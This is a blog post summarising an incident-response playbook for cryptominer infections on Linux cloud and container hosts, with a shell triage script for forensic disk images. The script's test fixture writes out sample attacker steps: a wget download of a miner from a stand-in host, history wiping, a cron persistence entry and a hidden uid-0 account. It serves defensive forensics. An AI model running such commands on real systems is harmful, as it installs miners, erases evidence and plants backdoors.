New Playbook on Responding to Mining Malware in Linux Container and Cloud Environments
Christopher Doman
Co-Founder/CTO at Cado Security - Cloud Forensics & Incident Response
We've released a new playbook! This time it's specifically on responding to Linux instances compromised by mining malware, as it's such a common thing we see in both cloud and container environments.
You can get the playbook here or view some highlights below:
Working out where to start your investigation is generally pretty easy as coin miners are so obvious. TLDR? Ctrl + F "xmrig" and you'll normally find something pretty quick!
Skipping ahead a bit... you'll typically find a ton of shell scripts, including at least one to install mining software:
This should lead to one of your investigation "Pivot Points" - searching for other files containing the domain name of the mining pool that the mining software talks to:
These days most miners choose to mine Monero (it's more profitable than mining Bitcoin and harder to trace) and you can pivot on the Monero wallet ID. A quick Google of it will also often tell you what particular campaign you're dealing with - including how the attackers got in and what backdoors were likely added:
The bash history is always worth checking, although these days many miners will wipe it once they finish installing:
Something else we've found super useful - but not discussed that often - is the Audit Log on many Linux distributions, including Amazon Linux:
Finally, always check for persistence. Normally these mining campaigns are smash and grab - but they also install backdoors for more manual access later, including adding users and scheduling tasks in cron:
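The steps above (grep for "xmrig", pivot on the pool domain and wallet ID, check bash history, check the audit log, check cron and added users) can be scripted against a read-only mount of a compromised instance's disk. The script below is an added example written for this post; it is not code from the playbook or from Cado Security. The ROOT argument is assumed to be the mount point of a forensic image, the argument shapes it matches (`-o host:port`, `--url=host:port`) and the file paths it inspects are assumptions, and the fixture it builds (pool.example.invalid, the wallet ID, the cron and passwd entries, the audit line) is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example: triage a mounted Linux root filesystem for coin-miner
# indicators. ROOT is assumed to be a read-only mount of a disk image.

# 1. Start where the post starts: look for "xmrig" anywhere on disk.
find_miner_refs() {   # usage: find_miner_refs ROOT -> prints matching files
  grep -rIli 'xmrig' "$1" 2>/dev/null || true
}

# 2. Pull mining-pool endpoints out of whatever launches the miner.
#    Assumed argument shapes: "-o host:port" or "--url=host:port".
extract_pool_hosts() {   # usage: extract_pool_hosts ROOT -> prints host names
  grep -rIhoE '(-o|--url)[ =]+[A-Za-z0-9._-]+:[0-9]+' "$1" 2>/dev/null \
    | sed -E 's/^(-o|--url)[ =]+//; s/:[0-9]+$//' | sort -u
}

# 3. Pivot point: every file that mentions an indicator (pool domain, wallet ID).
pivot_on() {   # usage: pivot_on ROOT INDICATOR -> prints files containing it
  grep -rIlF -- "$2" "$1" 2>/dev/null || true
}

# 4. Bash history: the post notes miners often wipe it, so report the state.
bash_history_state() {   # usage: bash_history_state ROOT -> present|wiped|missing
  f="$1/root/.bash_history"
  if [ ! -e "$f" ]; then echo missing
  elif [ ! -s "$f" ]; then echo wiped
  else echo present; fi
}

# 5. Audit log: EXECVE records survive a wiped shell history.
audit_execve_hits() {   # usage: audit_execve_hits ROOT -> prints matching records
  grep -hE 'type=EXECVE.*(xmrig|curl|wget)' "$1"/var/log/audit/audit.log* 2>/dev/null || true
}

# 6. Persistence: cron entries referencing an indicator, and extra uid-0 accounts.
cron_hits() {   # usage: cron_hits ROOT INDICATOR -> prints cron lines containing it
  grep -rIhF -- "$2" "$1/etc/crontab" "$1/etc/cron.d" "$1/var/spool/cron" 2>/dev/null || true
}
extra_uid0_users() {   # usage: extra_uid0_users ROOT -> uid-0 accounts other than root
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1/etc/passwd" 2>/dev/null
}

# Whole triage run, printed as a report an analyst can read top to bottom.
triage() {   # usage: triage ROOT
  r=$1
  echo "== files referencing xmrig =="; find_miner_refs "$r"
  echo "== mining pool hosts =="; extract_pool_hosts "$r"
  for host in $(extract_pool_hosts "$r"); do
    echo "== files referencing $host =="; pivot_on "$r" "$host"
  done
  echo "== root bash history: $(bash_history_state "$r") =="
  echo "== audit EXECVE records =="; audit_execve_hits "$r"
  echo "== cron entries referencing xmrig =="; cron_hits "$r" xmrig
  echo "== extra uid-0 accounts =="; extra_uid0_users "$r"
}

# Constructed fixture (fake image contents) so everything above runs offline.
make_fixture() {   # usage: make_fixture ROOT
  r=$1
  mkdir -p "$r/tmp" "$r/root" "$r/etc/cron.d" "$r/var/log/audit" "$r/var/spool/cron"
  cat > "$r/tmp/setup.sh" <<'EOF'
#!/bin/sh
# constructed installer fragment for the demo
wget -q http://pool.example.invalid/xmrig.tar.gz -O /tmp/x.tgz
/tmp/xmrig -o pool.example.invalid:3333 -u 4ACONSTRUCTEDWALLETID0000000000
history -c; rm -f ~/.bash_history
EOF
  printf '* * * * * root /tmp/xmrig -o pool.example.invalid:3333\n' > "$r/etc/cron.d/sysupdate"
  printf 'root:x:0:0::/root:/bin/sh\nsysmon:x:0:0::/tmp:/bin/sh\n' > "$r/etc/passwd"
  : > "$r/root/.bash_history"   # constructed: zero-length, i.e. wiped
  printf 'type=EXECVE msg=audit(1.1:1): argc=3 a0="wget" a1="-q" a2="http://pool.example.invalid/xmrig.tar.gz"\n' \
    > "$r/var/log/audit/audit.log"
}

# Stand-alone demo against the constructed image.
demo_root=$(mktemp -d)
make_fixture "$demo_root"
triage "$demo_root"
rm -rf "$demo_root"
```

To use it against a real case, skip make_fixture and call `triage /mnt/image` (or any other mount point); each helper can also be called on its own once a pool host or wallet ID has been recovered, which is the pivot the post describes.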
And... that's it! If you'd like to grab the full PDF you can do so here.